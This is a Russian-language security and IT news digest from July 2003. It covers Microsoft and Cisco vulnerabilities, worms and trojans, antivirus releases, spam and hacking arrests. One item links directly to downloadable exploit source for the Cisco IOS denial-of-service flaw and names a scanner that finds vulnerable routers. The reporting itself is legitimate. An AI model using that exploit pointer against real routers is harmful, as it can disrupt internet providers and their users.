Oracle воплощает в жизнь свой план переманивания заказчиков систем электронной почты у IBM и Microsoft, предложив модернизированное ПО коллективной работы. По словам руководителей компании, вышедшая в четверг последняя версия Oracle Collaboration Suite нацелена на организации, которые ищут более дешевую альтернативу IBM Lotus Notes и Microsoft Exchange. Сунир Капур, вице-президент Oracle по корпоративным системам обмена сообщениями и коллективной работы, сказал, что в первую очередь компания предложит Collaboration Suite своей собственной клиентской базе — это почти 200 тыс. организаций. Гигант СУБД пошел в наступление на IBM и Microsoft почти два года назад, заявив, что его Collaboration Suite — более надежная альтернатива конкурирующим технологиям. С момента выпуска первой версии ПО e-mail и календаря прошлой осенью Oracle приобрела 500 корпоративных заказчиков. Несмотря на то что рынок ПО коллективной работы относительно новый для Oracle, ее Collaboration Suite становится выгодной альтернативой для крупных корпораций, утверждает в недавнем отчете аналитик Forrester Даниель Расмус. Преимуществом Oracle служит тесная интеграция между ее популярной СУБД и такими приложениями коллективной работы, как e-mail, календари и программы обмена файлами. Источник - http://www.zdnet.ru
19/07/2003 14:19 Начато открытое бета-тестирование Антивируса Касперского® для Lotus Notes/Domino 4.5.
"Лаборатория Касперского", сообщает о начале бета-тестирования Антивируса Касперского® для Lotus Notes/Domino 4.5. Компания приглашает всех желающих принять участие в программе внешнего тестирования продукта, разработанного с учетом всех особенностей почтовых систем Lotus Notus/Domino и включающего в себя ряд существенных изменений и доработок. Антивирус Касперского® для Lotus Notes/Domino предназначен для обеспечения антивирусной защиты почтовых систем, построенных на базе Lotus Notus/Domino. Программа устанавливается на сервере, работающем под управлением операционной системы Linux или Windows NT, и проверяет всю проходящую через сервер почту и файлы баз данных на присутствие вирусов. Поиск вирусов производится и в тексте сообщений и в присоединенных к ним файлах. Кроме того, Антивирус Касперского® для Lotus Notes/Domino осуществляет поиск и нейтрализацию вирусов внутри вложенных архивов и упакованных exe-файлов, а также внутри вложенных файлов почтовых форматов и файлов почтовых баз. При этом Антивирус Касперского® для Lotus Notes/Domino может лечить как текст сообщения, так и вложенные в него файлы. Полностью переработанный интерфейс программы стал гораздо удобнее для пользователя, отличаясь большей эргономичностью и логичностью расположения индикаторов управления, а также полностью соответствует стандартам web-дизайна, что позволяет производить контроль и мониторинг состояния антивирусной защиты посредством интернет-доступа. Подробнее - http://www.kaspersky.ru/news.html?id=1313558
19/07/2003 14:03 Red Hat даёт попробовать новое ядро Linux.
Red Hat выполняет своё обещание дать людям попробовать новое ядро от Linus Torvalds - тестовую версию нового ядра 2.6 - сердце Linux. Red Hat сообщала в понедельник, что она выпустит 2.6.0-test1 RPM файлы обновления. Разработчик Red Hat Arjan van de Ven выпустил RPM пакеты, доступные для скачивания. Эти пакеты предназначены для Red Hat 9 (версии с кодовым названием "Shrike"). Cкачать - http://people.redhat.com/arjanv/2.5/RPMS.kernel/
19/07/2003 13:21 Хакер обещал взломать любой сайт.
17-летнего "хакера", который на заказ обещал взломать любой сайт и изготовить различные подслушивающие и подглядывающие устройства, задержали сотрудники столичного Управления по борьбе с экономическими преступлениями вчера на проспекте Мира. Как сообщили в УБЭП ГУВД Москвы, недавний школьник подыскивал клиентов через Интернет и с помощью торговцев Митинского радиорынка, которым платил проценты от сделок. Юный "гений" предлагал желающим всего за 2К долларов взломать сайт любой организации, а также изготовить "жучки", скрытые видеокамеры и прочие шпионские штучки. Юноша именовал себя участником хакерской группы "Пауки", на счету которой якобы несколько удачных взломов сайтов западных банков. Однако сыщики полагают, что парень придумал это, набивая сеье цену. На днях оперы вышли на "хакера" под видом потенциальных клиентов и попросили взломать сайт одного из крупных российских банков. Едва молодой человек получил 500$ В качестве предоплаты, сыщики повязали его. Позднее оперативники обыскали квартиру на просп. Мира, где "хакер" жил вместе с родителями. Те как раз на 3 месяца свалили на море. Сыщикам ещё предстоит выяснить, знали ли взрослые, чем на досуге занималось их чадо, и не пооощряли ли они его криминальную деятельность. В комнате парня милиционеры изъяли 10 готовых к использованию "жучков" и три авторучки, в которые были вмонтированы крошечные видеокамеры. Источник - http://www.mk.ru
19/07/2003 12:36 Эксплоит уязвимости в CISCO.
Недавно мы сообщали об уязвимости в маршрутизаторах СISCO, которая может сказаться на функционировании огромного числа ISP (провайдеров). Вкратце суть уязвимости заключается в следующем: сформировав специальный пакет с адресатом маршрутизатора CISCO, удалённый атакующий может вызвать у роутера DoS. Это происходит из-за неверной обработки пакета процессором, который выставляет ошибочный флаг о заполненности сетевой очереди и, таким образом, маршрутизатор перестаёт отвечать на запросы. Для восстановления функционирования требуется физическое вмешательство администратора для перезагрузки роутера. iDEFENSE выпущен эксплоит этой уязвимости. Однако, провисев некоторое время на сервере, эксплоит был убран и для того, чтобы его получить, рекомендуют связаться по Е-мейл analysis@idefense.com. Судя по всему, это было сделано из-за высокой опасности выведения из строя маршрутизаторов CISCO, Многие из которых стоят также на магистральных линиях Интернет. Тем не менее, на packetstorm исходник эксплоита всё-таки остался. Для сборки эксплоита необходима библиотеки libnet, которая прилагается. Кроме того, хотелось бы заметить, что уязвимые CISCO-роутеры ожно опеределить при помощи выпущенной Foundstone Inc. утилиты под названием SNScan, представляющей собой сканер уязвимых по протоколу SNMP cистем, который был проанонсирован во вчерашней программе дня. Эксплоит - http://packetstorm.linuxsecurity.com/0307-exploits/shadowchode.tar.gz
19/07/2003 01:50 The Wonderful World of Linux 2.6
Под таким названием вышла статья, описывающая нововведения в новой ветви ядра ОС Linux. Ознакомиться - http://www.kniggit.net/wwol26.html
18/07/2003 14:23 Создание поддельных или изменяемых интерфейсов пользователя в Microsoft Internet Explorer.
Уязвимость обнаружена в Microsoft Internet Explorer в использовании 'chromeless' окна. Удаленный пользователь может изменять появление Web страницы, чтобы обмануть целевого пользователя. Метод window.createPopup позволяет удаленному пользователю открывать chromeless окно, которое перекроет настоящее окно. В результате удаленный пользователь может создать поддельные или изменяемые интерфейсы пользователя на системе целевого пользователя. Ссылка на демонстрационный Эксплоит прилагается. Уязвимость обнаружена в Microsoft Internet Explorer 5.5-6.0 и более ранние версии Способов устранения обнаруженной уязвимости не существует в настоящее время. Подробности - http://securitylab.ru/?ID=38990
18/07/2003 14:01 Сайт "Кавказ-центра" пытался приютить в собственной квартире литовский депутат.
Чеченские сепаратисты облюбовали прибалтийские страны, как площадку для размещения своего главного рупора - интернет сайта "Кавказ-центр". Доходит до того, что сервер размещают в свой квартире народные избранники, защищающие сайт своим иммунитетом. Как передает "Интерфакс", член сейма Литвы Пятрас Гражулис пытался в своей служебной квартире установить сервер чеченского интернет-сайта "Кавказ-центр". Уже в четверг Гражулис, представляющий в парламенте оппозиционную Христианско-Демократическую партию, обвинил департамент госбезопасности Литвы в том, что сотрудники последнего якобы лишили его квартиру связи. Естественно, Гражулис уверен, что спецслужбы действовали по заказу России. Источник - http://www.runet.ru
18/07/2003 13:32 Cisco исправляет ошибку в ПО для маршрутизаторов.
Компания Cisco выпустила обновленнное программное обеспечение для сетевого оборудования собственного производства. Обновление содержит заплатку, устраняющую серьезную уязвимость, которая могла использоваться для проведения DoS-атак. Уязвимость была обнаружена в широко использующейся в сетевых маршрутизаторах операционной системе Internetworking Operating System и касается только устройств, работающих по протоколу IPv4 (устройства, работающие с более современным, но менее распространненным протоколом IPv6 не подвержены данной уязвимости). Как сообщается в заявлении Cisco, уязвимость может быть задействована путем отправки определенной последовательности пакетов данных на устройство под управлением IOS. В результате, происходит переполнение очереди входящих пакетов, и устройство прекращает обработку данных. Проблема была обнаружена в результате исследований сотрудников Cisco. Как сообщается на сайте SiliconValley, после выхода патча большинство интернет-провайдеров временно приостановили работу служб доступа к сети для обновления программного обеспечения. Источник - http://cisco.com/en/US/products/hw/routers/ps341/products_security_advisory09186a00801a34c2.shtml
18/07/2003 13:06 Время Netscape прошло.
Медиа-гигант America Online (AOL), владеющий компанией Netscape, уволил 50 программистов, работавших над новой версией одноименного браузера. Впрочем, в AOL подчеркивают, что браузер не умрет, поскольку от поддержки старых версий программы компания отказываться не собирается. Остальные сотрудники Netscape переведены на другой проект - AOL Communicator, где они будут работать над программой мгновенного обмена сообщениями. Еще 6 программистов займутся поддержкой Netscape, работая в Mozilla Foundation. Данный шаг AOL был вполне ожидаемым. Рыночная доля Netscape была мизерной. Еще 2 года назад представители компании Netscape заявляли о том, что рынок программного обеспечения перестал быть основным для нее и компания намерена заняться индустрией развлечений. AOL получила торговую марку Netscape в 1998 году. Сам браузер появился на рынке четырьмя годами раньше. В основе программы лежали разработки студентов университета штата Иллинойс. Группу программистов возглавлял Марк Андреессен. После окончания университета он и его приятель Джим Кларк создали компанию Netscape и взялись за создание коммерческой версии своего браузера. Источник - http://www.cnews.ru
18/07/2003 12:02 Итоги вирусной активности за первую половину 2003 года.
Комапания Panda Software подвела итоги вирусной активности первой половины 2003г. Первое полугодие 2003 года можно охарактеризовать как переходный период: наблюдаемый процесс эволюции компьютерных вирусов показывает направление их дальнейшего развития. Первое важное событие этого полугодия – появление вируса SQL Slammer. Он представляет собой новое поколение вредоносных кодов, распространяющихся непосредственно в сети Интернет и использующих дыры в программном обеспечении (в данном случае в SQL серверах). Следует признать, что SQL Slammer изрядно потрепал нервы пользователям из-за большого количества пораженных им серверов. Список вирусов, наиболее часто обнаруживаемых бесплатным онлайновым антивирусом Panda ActiveScan, в течение первых пяти месяцев возглавлял почтовый червь Klez.I. В начале июня на сцене появляется червь/троян Bugbear.B, который выбил из седла Klez.I. и занял место лидера. Эпидемия Bugbear.B позволяет говорить о другой тенденции: хотя в центре внимания по-прежнему остаются почтовые черви, использующие методы социального инжиниринга и дыры в программном обеспечении, значительную долю в общем числе заражений теперь составляют вирусы нового типа – гибриды червя и трояна. Вирусы нового типа, как следует из названия, объединяют в себе характеристики обоих типов вредоносных кодов, благодаря чему становятся вдвойне опаснее каждой из названных групп по отдельности. В частности, от троянов им досталась способность открывать доступ к компьютеру пользователя или воровать конфиденциальную информацию, например, базы данных клиентов, номера банковских счетов, кредитных карточек и т.д. Подробнее - http://www.viruslab.ru/press/index.php?go=show&num=179
18/07/2003 11:22 Антиcпамерская ассоциация провела первую акцию.
Весь день 17 июля работа "Центра американского английского", известного массовым спамом с целью своей рекламы, была практически парализована. Его сотрудники вынуждены были слушать по телефонам фрагмент аудиоинтервью первого замминистра связи и информатизации Андрея Короткова, которое тот дал порталу "Рамблер-Аудио". В свое время г-н Коротков написал в "Центр" письмо с просьбой исключить его из списка рассылки, однако сообщения продолжали приходить. В интервью разгневанный замминистра называет деятельность центра незаконной. Организовать же автодозвон по номерам "Центра", считающегося одним из самых злостных спамеров Рунета, взялась компания Golden Telecom. Rambler, Golden Telecom и еще несколько телекоммуникационных компаний являются членами недавно образованной антиспамерской ассоциации. События 17 июля стали ее первой акцией. Источник - http://www.kommersant.ru/
17/07/2003 18:23 База данных по анти-спаму.
Благодаря anfrax.ru, обнаружился довольно интересный сайт, посвящённый борьбе со спамом. На сайте подобраны ссылки на многие программы для борьбы со спамом как для операционной системы *nix, так и для почтовых клиентов ОС Windows. Со своей стороны хотелось бы поблагодарить автора за проделанную работу. Страница - http://wiki.forth.org.ru/AntiSpam
17/07/2003 17:36 Полку почтовых сервисов в Рунете прибыло.
В Рунете появился еще один бесплатный почтовый сервис. Стандартный набор и нынешнее насыщение рынка делают перспективы Mail15.com довольно туманными. Mail15.com бесплатный сервис, предоставляющий в соответствующем домене почтовый ящик со следующими характеристиками: 20 Мб памяти для хранения корреспонденции и 20 Мб для создания своей странички, максимальный суммарный размер письма - 15 Мб, максимальный размер прикладываемого файла - 10 Мб, количество записей в адресной книге не ограничено. Доступна настройка антиспамовых фильтров и переадресации почты на другой ящик. Пользователям предоставляется англо-русский и русско-английский словарь-переводчик, а также проверка орфографии на двух языках (русском и английском). Администрация предупреждает, что аккаунты поддерживаются при наличии активности - не менее 1-го авторизованного входа в систему за 3 месяца. Источник - http://www.runet.ru
17/07/2003 17:21 Уязвимость в SMTP-сервисе Win2K.
Ещё одна уязвимость в одном из сервисов Win2K. На этот раз затронут сервис SMTP, cвязанный с отправкой и посылкой электронной почты. В частности, Microsoft Exchange Server 2000 в ОС Win2K c установленным 3-м сервис-паком. Из-за некорректного механизма обработки почты можно вызвать отказ сервера (DoS). Для этого злоумышленник должен послать почтовое сообщение с некорректным временным штампом (атрибут FILETIME). В базе данных уязвимостей M$ уязвимости присвоен код 330716. Для устранения оной необходима установка 4-го сервис-пака (русская версия которого, напомним, пока недоступна). Подробности - http://support.microsoft.com/default.aspx?kbid=330716
17/07/2003 16:02 И ещё 2 бюллетеня по безопасности от Microsoft.
Похоже, мегакорпорацию Microsoft серьёзно лихорадит уже вторую неделю в части безопасности выпускаемых ей версий ОС Windows. Вслед за бюллетем MS03-026 последовали ещё 2 бюллетеня - MS03-027 и 028. 027 cвязан с уязвимостью в неверных аттрибутах файла desktop.ini ОС Windows XP c SP1. Модуль, используемый оболочкой Windows для извлечения информации об атрибутах некоторых папок может вызвать переполнение буфера ОС. Злоумышленник может создать специальный Desktop.ini файл с некорректный атрибут, и затем выложить тот файл на сетевом ресурсе. MS03-028 описывает «дыру» в пакете ISA Server 2000. Этот сервер содержит базу страниц, которые возвращаются клиентам в случае ошибочных HTTP-запросов. Вот в этой-то базе и содержится уязвимость типа XSS (кросс-сайт скриптинг). MS03-027 - http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS03-027.asp MS03-028 - http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS03-028.asp
17/07/2003 15:54 И ещё про уязвимость в Windows 2003.
Корпорация Microsoft сообщила 16 июля о серьезной уязвимости во всех ОС семейства Windows NT, причем это первая подобная недоработка, обнаруженная в самой новой серверной операционной системе Windows Server 2003. Microsoft присвоил новой «дыре» статус «критической», что по классификации компании означает самую высокую степень угрозы безопасности, и призвал всех пользователей как можно скорее скачать бесплатную «заплатку» для исправления этой проблемы с корпоративного сайта. Кроме того, две уязвимости, пусть и менее серьезные, были обнаружены в ОС Windows XP с установленным пакетом обновлений Service Park 1 и в пакете Internet Security and Acceleration (ISA) Server 2000. Критическая уязвимость во всех ОС семейства Windows NT связана с ошибкой переполнения буфера в интерфейсе DCOM протокола RPC, ответственного за удаленный вызов процедур в операционной системе. По словам представителей Microsoft, с помощью этой «дыры» хакеры могут получить доступ к хранящимся на удаленных компьютерах данным и электронной почте, смогут удалять файлы и т.п. Как ожидают эксперты, хакеры воспользуются новой «дырой» уже в ближайшие месяцы, так что с установлением «заплаток» тянуть не стоит. Первая серьезная «дыра» в самой новой серверной операционной системе Windows Server 2003 должна была особенно сильно расстроить Microsoft – ведь эта система, рассчитанная на крупных корпоративных клиентов, была объявлена самой надежной и безопасной в семействе серверных ОС Windows и стала первым продуктом, выпущенным в рамках концепции защищенных информационных систем (Trustworthy Computing), объявленной в прошлом году Биллом Гейтсом. На церемонии официального выпуска Windows Server 2003 в конце апреля этого года исполнительный директор Microsoft Стив Баллмер (Steve Ballmer) объявил, что новая серверная Windows является «прорывом в плане средств встроенной защиты и надежности системы”. Подробное описание - http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS03-026.asp
17/07/2003 15:03 В Windows Server 2003 обнаружена первая критическая уязвимость.
Microsoft подтвердил наличие серьезной уязвимости практически во всех версиях своей ОС Windows, включая последнюю разработку - Windows Server 2003. По словам представителей компании, уязвимость позволяет хакерам получить доступ к удаленному компьютеру через интернет, красть данные, удалять файлы или получать доступ к электронной почте. Пользователей настоятельно просят загрузить с сайта компании бесплатный патч для устранения этой дыры. Найденной уязвимости подвержена и ОС Windows XP, популярная среди домашних пользователей. В этой ОС нашлось еще несколько недоработок, характерных только для данной версии. И хотя эти “дыры” компания посчитала не столь серьезными, для них также выпущена "заплатка". Найденная уязвимость стала довольно неприятной новостью для Microsoft, поскольку впервые затронула его новейшую серверную ОС, объявленную самой защищенной из всех своих предшественниц. Однако всего через три месяца после начала продаж группа польских исследователей, называющих себя Last Stage of Delirium Research Group, нашла способ обойти дополнительные меры защиты Microsoft. Как сообщили поляки, они создали инструмент, демонстрирующий результаты использования найденных уязвимостей, однако это ПО не появится в интернете. Группа, пользующаяся авторитетом среди специалистов по информационной безопасности, собирается обнародовать технические детали проекта на закрытых семинарах по информационной безопасности. Впрочем, благие намерения польских специалистов не спасут пользователей от хакерских атак, использующих новую уязвимость, которые должны начаться, по ожиданиям экспертов, в ближайшие три месяца. Источник - http://www.ap.org/
17/07/2003 14:46 Новый червь Lohack.B попадает на компьютеры в письме якобы от Panda Software.
Вирусная Лаборатория Panda Software обнаружила нового червя массового распространения Lohack.B. Этот вредоносный код использует методы социального инжиниринга, заставляя неискушенных пользователей считать, что зараженное письмо получено из Министерства науки и техники Испании или от международного антивирусного разработчика компании Panda Software. Червь использует известную уязвимость браузера Microsoft Internet Explorer для автоматического запуска при открытии зараженного письма в окне предварительного просмотра. Lohack.B попадает компьютеры пользователей в электронном письме, написанном на испанском языке, со следующими характеристиками: Отправитель: - Ministerio de Ciencia y Tecnologia [info@myct.es]; - Panda Antivirus [info@myct.es]. Тема (возможно несколько вариантов): - Información sobre la LSSICE; - Información sobre la LSSICE y sus consecuencias; - Nuestras libertades en internet en peligro; - FW:AVISO IMPORTANTE: un nuevo virus llamado LS. Текст письма (возможен следующий вариант): AVISO URGENTE PandaSoftware Antivirus acaba de publicar... Вложенный файл содержит червя Lohack.B и всегда имеет расширение exe или scr. Службе технической поддержки Panda Software еще не приходилось сталкиваться с вирусными инцидентами с данным червем, однако, пользователям рекомендуется быть осторожными при чтении всей входящей корреспонденции. Источник - http://www.viruslab.ru
17/07/2003 14:09 Дыра в маршрутизаторах CISCO может нарушить работу Интернет.
Сегодня основным держателям опорных сетей было разослано уведомление, в котором предупреждается о серьезной уязвимости во всех версиях CISCO IOS. Удаленный пользователь может нарушить работу устройства. Как сообщается, удаленный пользователь может послать 75 некорректных пакетов к CISCO устройству, чтобы перезагрузить или завесить маршрутизатор. Уязвимы большинство (может даже все) версии CISCO IOS. Официально об уязвимости будет сообщено сегодня в 4:00 PM Pacific time. Подробности - http://securitylab.ru/?ID=38969
17/07/2003 13:44 Троянец Webber превращает компьютеры в спам-машины.
"Лаборатория Касперского" сообщает о регистрации массовой рассылки нового "троянца" Webber (другой вариант названия - Heloc). Компания уже получила от пользователей несколько сообщений об инцидентах, вызванных этой вредоносной программой. Опасность Webber заключается в установке на зараженный компьютер прокси-сервера - специальной программы, при помощи которой злоумышленники могут рассылать через него спам и любые другие данные. За последнюю неделю "Лаборатория Касперского" обнаружила уже 3 "троянца" подобного типа. "По сути, мы имеем дело с нелегальным созданием распределенной сети, с помощью которой хакеры могут производить массовую рассылку спама, используя ресурсы зараженных компьютеров, - комментирует Евгений Касперский, руководитель антивирусных исследований компании. - Больше всего нас беспокоит то, что эта сеть также может быть использована и в совершенно иных целях. В том числе для проведения глобальной хакерской атаки или направленной DDoS-атаки на Web-ресурсы крупной компании или правительственного учреждения". Webber широко распространился по интернету благодаря состоявшейся вчера массовой почтовой рассылке. Письма имели тему "Re: Your credit application", содержали текст на английском языке и вложенный файл "web.da.us.citi.heloc.pif", название которого напоминает web-адрес, что в некоторых случаях может смутить пользователя и заставить его запустить зараженный файл. Если это произошло, Webber незаметно загружает с удаленного web-сервера дополнительные компоненты и устанавливает их на компьютере. В качестве побочных действий "троянец" также пересылает своему "хозяину" список обнаруженных в кэш-памяти паролей. Источник -http://www.kaspersky.ru
16/07/2003 13:41 Сборник статей по сетевым технологиям.
На сайте московской компании АБН, занимающейся компьютерными сетями и кабельными сетями обнаружена довольно полезная подборочка статей, посвящённых сетевым технологиям. Представлены такие разделы, как "Практическое руководство по монтажу", "Технологии передачи данных", "Технологии построения сетей", "Обзор сетевого оборудования" и много другой полезной иннформации, представляющей несмненный интерес для людей, занимающихся прокладкой и настройкой сетевого и программного оборудования. Статьи - http://www.abn.ru/inf/
16/07/2003 12:38 Уязвимостьь в nfs-utils ОС Linux.
Janusz Niewiadomski обнаружил уязвимость в наборе утилит для работы по протоколу прикладного уровня NFS - Network File System. Этот протокол позволяет монтировать в ОС *NIX сетевые диски как локальные, использует протокол RPC. Уязвимость была обнаружена в механизме, при помощи которого функция xlog() переключает запросы для регистрации. Переполнение буфера становится возможным, когда эта функция пытается добавить отсутствующий признак новой строки к строке регистрации. Локальный и удалённый злоумышленник при помощи специально сформированного RPC-запроса к демону mountd может вызвать переполнение буфера, и, как следствие, привести либо к отказу в обслуживании (DoS), либо к возможности выполнения произвольного кода в системе. Четыре производителя дострибутивов Linux уже отстрелялись патчами: Debian, RedHat, SuSe и Slackware. Подробности - http://isec.pl/vulnerabilities/isec-0010-linux-nfs-utils.txt
16/07/2003 12:16 Microsoft усиливает защиту веб-сервисов.
Во вторник Microsoft выпустила комплект инструментов, помогающих программистам усилить защиту своих веб-сервисов. Инструментарий, называемый Web Services Enhancements (WSE) версии 2, позволит компаниям использовать последние достижения в области безопасности Microsoft и других софтверных гигантов, таких как IBM и Sun Microsystems. Производители ПО стараются усилить безопасность, чтобы подтолкнуть распространение веб-сервисов. Веб-сервисы — это набор соглашений программирования и XML-стандартов для создания приложений, способных легко обмениваться информацией. Сейчас предприятия используют веб-сервисы как способ передачи данных между отдельными системами. Однако недостаточно высокая степень защиты данных, передаваемых по интернету и частным сетям, мешает более широкому их использованию. WSE версии 2 упрощает процесс защиты коммуникаций между сторонами и удостоверения личности людей, участвующих в бизнес-транзакции. Комплект инструментов реализует ряд спецификаций защиты, разработанных с участием Microsoft, включая WS-Policy, WS-SecurityPolicy, WS-Trust, WS-SecureConversation и WS-Addressing. Эти опубликованные спецификации, еще не ставшие повсеместно соблюдаемыми отраслевыми стандартами, предназначены для работы с Web Services Security, другой поддерживаемой Microsoft спецификацией, которая проходит процесс стандартизации в OASIS (Organization for the Advancement of Structured Information Standards). Инструменты WSE версии 2 доступны на веб-сайте Microsoft для разработчиков. Со временем Microsoft добавит их в свой набор инструментов разработки Visual Studio.Net и .Net Framework, ПО «структуры», необходимое для исполнения веб-сервисов на операционных системах Windows. Подробнее - http://msdn.microsoft.com/webservices/
16/07/2003 12:07 Выход очередного номера журнала Crypto-Gram.
15 июля вышел очередной (июльский) номер журнала Crypto-Gram, посвящённый компьютерной безопасности и криптографии. Об этом сообщил Bruce Schneier, основатель и руководитель компании Counterpane Internet Security, Inc., которая, собственно и занимается поддержкой и выпуском этого журнала. Представлены следующие темы: The Doghouse, YTech, Email Filtering Idiocy, News, Password Safe, Crying Wolf, Comments from readers. Журнал - http://www.counterpane.com/crypto-gram-0307.html
16/07/2003 11:58 Спамеры маскируются под электронный журнал по борьбе со спамом.
До сих пор противоборствующие стороны - спамеры и сторонники цивилизованного использования электронной почты - не сталкивались в открытую, ведя в основном тактическую борьбу "по разные стороны баррикад". Спамеры продолжали свои мусорные рассылки, производители спам-фильтров совершенствовали технологии фильтрации, специалисты по email-маркетингу пропагандировали его цивилизованные формы. Хотя спамеры и не скрывались, настаивая на законности своего бизнеса, до открытой конфронтации дело не доходило. Авторы массовых рассылок не выступали в качестве явно и публично нападающей стороны. Последний инцидент нарушил это хрупкое равновесие. Впервые спамеры открыто вступили в противоборство, начав маскировать свои рассылки под Электронный журнал Спамтест, организованный участниками антиспамерской коалиции - компанией "Ашманов и партнеры", Лабораторией Касперского и Информационным каналом Subscribe.Ru. Очередное мусорное письмо было озаглавлено "Электронный журнал АНТИ-спамтест. Все о борьбе с АНТИспамом". При этом было указано, что у него 5 миллионов "подписчиков". (Видимо, имелась в виду огромная база распространения письма). Цвет фона, доменное имя в поле From, обращение "к подписчикам" и другие элементы были позаимствованы у электронных периодических изданий Subscribe.Ru. Внутри самого "журнала" (спамерского письма) располагалась традиционная для таких рассылок реклама малого бизнеса: оборудование и запчасти производства ОАО "Уралмаш" в Екатеринбурге и тому подобное. При этом в письмо были вставлены не только электронные адреса заказчиков, но и... ссылки на сайты компаний - участников антиспамерской коалиции. Подробнее - http://www.internet.ru/lentanews/n_7y62.esp
16/07/2003 11:34 В России аудио и видео запрещено продавать с лотков.
Правительство РФ запретило продажу аудио- и видеопродукции с лотков и в палатках. Как сообщил департамент правительственной информации во вторник, соответствующие изменения и дополнения в правила продажи отдельных видов товаров утверждены постановлением правительства РФ. Согласно изменениям, аудиовизуальные произведения и фонограммы добавлены к перечню товаров, продажа которых не разрешена при осуществлении розничной торговли вне стационарных мест торговли: на дому, по месту работы и учебы, на транспорте, на улице и в иных местах. Кроме того, правительство расширило перечень сведений, которые продавец аудиовизуальных произведений и фонограмм обязан предоставлять покупателю. В частности, продавец обязан предоставлять сведения об обладателе авторских и смежных прав на аудиовизуальные произведения и фонограммы. Правительство также внесло дополнения в положение о лицензировании деятельности по воспроизведению аудиовизуальных произведений и фонограмм, обязывающие производителей указывать на экземпляре аудиовизуального произведения и фонограммы или на упаковке сведения об обладателе авторских и смежных прав и о технических характеристиках аудио- или видеоносителя и записи аудиовизуального произведения и фонограммы. Источник - http://www.interfax.ru
16/07/2003 11:12 Студенты-хакеры угодили в суд, не успев завершить свой главный проект.
Американский суд завершил рассмотрение иска компании Blackboard к двум студентам - Билли Хоффману из Политехнического института штата Джорджия (Атланта) и Вирджила Гриффита из Алабамского университета в Бирмингеме. Blackboard занимается производством торговых автоматов и систем платежей по дебетовым картам, которые используются в 223 американских вузах. Хоффман и Гриффит якобы взломали эту систему, за что на них и подали иск. Однако в суде выяснилось, что готовая система взлома карт Blackboard так и не была реализована. Это позволило сторонам заключить мировое соглашение. По его условиям, горе-хакеры должны извиниться перед Blackboard, отказаться от планов по взлому систем этой компании и потратить 40 часов на общественные работы. Источник - http://www.compulenta.ru
16/07/2003 10:41 Опасный вирус маскируется под обновление для Windows.
Компания Symantec предупреждает о появлении крайне опасного червя W32.Gruel@mm. Ситуацию спасает только то, что он пока мало распространен. Червь распространяется по электронной почте и в пиринговой сети Kazaa. В первом случае он маскируется под критическое обновление для ОС Windows, а во втором - под генератор ключей для Windows XP. На деле же при запуске происходит совсем иное: червь удаляет системные файлы Windows, обеспечивает свой запуск при запуске других программ, а также демонстрирует фальшивое сообщение об ошибке, при попытке закрыть которое открывается множество окон панели управления, исчезает панель задач, скрывается значок диска С и выполняются другие малоприятные для пользователя действия. Источник - http://www.compulenta.ru
16/07/2003 10:07 Новый IRC-троян Ataka-E.
Компания Sophos предупреждает о появлении нового трояна Ataka-E, распространяющегося через IRC-чаты. Ataka-E распространяется в виде инсталляционного файла, при запуске которого в систему записываются несколько файлов, часть из которых не представляют никакой опасности. Один из файлов с именем Gamma.exe является троянской программой Troj/Prx-A, которая открывает на компьютере два TCP-порта. Через эти порты в систему может проникнуть хозяин трояна. Описание - http://www.sophos.com/virusinfo/analyses/trojatakae.html
15/07/2003 19:01 Новая security-рассылка.
12 июля на subscribe.ru была открыта новая security-рассылка - "Russian Security and Hack Info". В рассылке планируется публиковать следующую информацию: - Новости из мира компьютерной безопасности. - События с арены хакерского андеграунда. - Оперативные сведения о свежих уязвимостях, новых вирусах, троянах и т.д. - Обзоры ресурсов security-тематики. - Избранные статьи на русском языке с популярных security-сайтов. - Множество другой интересной и полезной информации. Рассылка предназначена для системных администраторов, IT-специалистов, а также людей, просто интересующихся компьютерной безопасностью. О рассылке ссобщил сам ведущий рассылки - Tyuba. Подписаться - http://subscribe.ru/catalog/inet.safety.hackinfo
15/07/2003 18:16 Выпущен дистрибутив Blin v1.3.
Blin (CD-Сache Edition) - это загружаемый компакт диск c операционной системой Linux основанной на базе дистрибутива Blin. Подход реализованный в Blin CD-Cache позволяет, при наличии на машине 64Mb памяти и более, разместить всю систему полностью в оперативной памяти компьютера, при этом привод CD-ROM тут же освобождается и его можно использовать по прямому назначению. Использована эффективная сжатая файловая система squashfs. Образ системы занимает 36Mb, что позволяет записывать его не только на CD-R и CD-RW носители стандартного размера, но и на Business Card. Претерпел значительные изменения процесс загрузки системы. Сейчас он выстроен таким образом, чтобы обеспечить более удобное использование вашего компьютера как для локальной работы так и в режиме X-терминала. Система базируется на ядре версии 2.4.21 с поддержкой ext2,ext3,xfs,vfat,reiserfs,ntfs,squashf s. Драйвера для популярных сетевых и звуковых карт поставляются в виде модулей. В дистрибутив включены проигрыватель MPlayer, аудио проигрыватель, Samba-клиент, openssh и т.д. Всего более 60-ти пакетов. Сайт проекта - http://blin.zp.ua/
15/07/2003 17:43 Cyberplat взломали.
В понедельник на сайте securitylab.ru появилось сообщение о серьезной бреши в защите электронной платежной системы Сyberplat, обнаруженной одним из посетителей два месяца назад. Он утверждает, что сразу же сообщил об этом по всем указанным на сайте Сyberplat адресам, но не получил никакого отклика и решил обнародовать свое открытие в форуме securitylab.ru. По оценке securitylab.ru, обнаруженные дыры в защите позволяли не только скачать всю базу данных Cyberplat, но и редактировать сайт компании. В доказательство правоты своих слов посетитель, обнаруживший дыры, оставил на одной из страниц Cyberplat несколько стихотворных строк. В заметке утверждается, что представители Cyberplat отказались признать серьезность обнаруженных пробелов в защите. Директор департамента информационных технологий Cyberplat Сергей Чекин высказал мнение, что существовали лишь незначительные уязвимости на второстепенных ресурсах, которые не могли повлечь утери важной информации. К концу рабочего дня сервер Сyberplat стал недоступен, а связаться с компанией по телефону не удавалось. Компания Cyberplat.com была образована в мае 2000 года банком «Платина», который передал ей все права на систему приема интернет-платежей Cyberplat. В 2001 году оборот Cyberplat.com составил 57,4 млн $, и к этой платежной системе присоединилось в общей сложности 13 банков. Источник - http://www.zdnet.ru
15/07/2003 17:09 Уязвимость Windows сохраняется!
